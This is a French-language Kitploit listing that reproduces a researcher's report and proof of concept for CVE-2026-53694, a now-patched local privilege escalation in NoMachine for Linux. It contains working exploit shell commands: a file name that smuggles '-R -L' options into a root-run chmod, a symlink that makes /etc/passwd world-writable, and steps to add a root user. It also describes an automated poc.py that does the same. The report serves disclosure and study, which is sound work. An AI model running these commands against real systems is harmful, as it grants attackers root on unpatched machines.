Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-53694-NoMachine-LPE — Exploit de preuve de concept et rapport pour CVE-2026-53694, une élévation de privilèges locale dans NoMachine pour Linux via une injection d'arguments dans nxchmod.sh, permettant un accès root via la manipulation de liens symboliques. | Kitploit
Outils/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

Exploit de preuve de concept et rapport pour CVE-2026-53694, une élévation de privilèges locale dans NoMachine pour Linux via une injection d'arguments dans nxchmod.sh, permettant un accès root via la manipulation de liens symboliques.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 2 moisPas encore vérifié

CVE-2026-53694 : Élévation de privilèges locale dans NoMachine par injection d'arguments

CVE Status Target Language

Aperçu

Ce dépôt contient le rapport et la preuve de concept (PoC) pour CVE-2026-53694, une vulnérabilité d'élévation de privilèges locale (LPE) dans NoMachine pour Linux.

En raison d'une neutralisation incorrecte des délimiteurs d'arguments dans le script nxchmod.sh, un utilisateur local non privilégié peut injecter des arguments dans une commande système exécutée en tant que root. En combinant cette injection d'arguments avec un lien symbolique, un attaquant peut écraser des fichiers système critiques (comme /etc/passwd) et élever ses privilèges jusqu'à root.

Cette vulnérabilité a été entièrement corrigée par l'éditeur.

Le processus de découverte

Trouver cette vulnérabilité a été un processus d'essais, d'erreurs et d'une prise de conscience tardive. Voici comment la découverte s'est déroulée :

  1. Observation de la cible : J'ai remarqué que le script /usr/NX/scripts/restricted/nxchmod.sh était exécuté périodiquement par l'utilisateur root pour gérer les permissions dans des répertoires spécifiques.
  2. Idée initiale (l'impasse) : J'ai vu que le script appliquait chmod a+rw aux fichiers. J'ai pensé : Si je contrôle la destination, puis-je utiliser un lien symbolique pour rendre /etc/passwd inscriptible ? J'ai testé un lien symbolique standard (ln -s /etc/passwd /tmp/asdf), mais cela a échoué. Le sticky bit de Linux sur des répertoires comme /tmp empêche l'utilisateur root de suivre aveuglément un lien symbolique créé par un autre utilisateur.
  3. La percée : En examinant l'exécution du script plus tard, j'ai remarqué comment la commande était construite : ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. Le script prenait le nom de fichier littéral et le passait directement à chmod.
  4. Injection de commande via le nom de fichier : J'ai réalisé que je pouvais créer un fichier avec des espaces et des options dans son nom. J'ai créé un fichier nommé X1234 -R -L. Lorsque le script s'exécutait, la commande chmod développait cela en arguments plutôt qu'en un seul chemin de fichier.

Analyse technique

La vulnérabilité provient de la manière dont NoMachine gère les permissions des sockets X11/Wayland. Le script nxchmod.sh est lancé par le démon nxserver.bin s'exécutant en tant que root.

L'exécution vulnérable ressemble à ceci :

root@kitploit:~
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

Si un attaquant crée une structure de répertoires et un fichier nommé X1234 -R -L, la commande résultante exécutée par root devient : /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

Lorsqu'un lien symbolique pointant vers /etc/passwd est placé dans le répertoire X1234, les arguments injectés -R et -L forcent chmod à suivre récursivement le lien symbolique et à accorder des permissions de lecture/écriture globales au fichier cible.

Conditions requises pour l'exploitation

Pour que cette exploitation fonctionne, le système cible doit remplir les conditions suivantes :

  • Le système d'exploitation doit utiliser Wayland (pas X11).
  • Xwayland doit être actif.
  • Une session graphique doit être en cours d'exécution (l'écran de connexion est suffisant).

Preuve de concept

Vous pouvez reproduire cette vulnérabilité soit manuellement à l'aide de commandes shell, soit automatiquement à l'aide du script Python fourni.

Méthode 1 : Exécution manuelle (Shell)

Accédez à /tmp/.X11-unix/ et exécutez les commandes suivantes pour créer la structure de répertoires malveillante.

root@kitploit:~
cd /tmp/.X11-unix/

# 1. Mise en place de l'exploitation
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Attendez que nxchmod.sh s'exécute (cela peut prendre jusqu'à 60 secondes).
# Vérifiez que les permissions de /etc/passwd sont devenues -rw-rw-rw-
# Vous pouvez maintenant éditer /etc/passwd pour ajouter un utilisateur root.

Une fois que vous avez vérifié la vulnérabilité et élevé les privilèges, exécutez les commandes de nettoyage suivantes pour restaurer la stabilité du système et supprimer les artefacts :

root@kitploit:~
# 2. Nettoyage
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

Méthode 2 : Exploit automatisé

Un exploit automatisé complet est fourni dans poc.py. Ce script vérifie les prérequis Wayland, met en place le lien symbolique, attend le cycle d'exécution de nxchmod.sh et injecte un nouvel utilisateur root (gg) dans /etc/passwd.

Pour exécuter l'exploit :

root@kitploit:~
python3 poc.py

Correction

Cette vulnérabilité a été corrigée par NoMachine. Les utilisateurs doivent mettre à jour vers les versions suivantes ou ultérieures :

  • NoMachine 9.5.7
  • NoMachine 8.23.2

Chronologie

  • 2026-04-20 : Vulnérabilité signalée à l'éditeur.
  • 2026-04-23 : L'éditeur a confirmé la vulnérabilité et accepté une divulgation coordonnée.
  • 2026-05-07 : L'éditeur a publié des versions corrigées (9.5.7 et 8.23.2) et publié le Trouble Report TR04X11802.
  • 2026-06-10 : CVE-2026-53694 publiée dans le NVD. (L'enregistrement officiel MITRE est actuellement en attente d'une analyse complète et de mises à jour de crédits (dernière vérification le 01-07-2026))

Références

  • NoMachine Trouble Report TR04X11802
  • NoMachine Software Update SU05X00274
  • NoMachine Software Update SU05X00275
  • NVD - CVE-2026-53694
Télécharger l’outil
  • Contournement du sticky bit : En injectant les options -L (suivre les liens symboliques) et -R (récursif) dans la commande chmod via le nom de fichier, j'ai forcé le binaire chmod lui-même à résoudre et à suivre le lien symbolique que j'avais créé dans le répertoire, contournant complètement la protection du sticky bit.
  • Atteindre l'élévation de privilèges : Une fois /etc/passwd rendu inscriptible (a+rw), j'ai simplement pu ajouter un nouvel utilisateur root au fichier et exécuter su pour y accéder.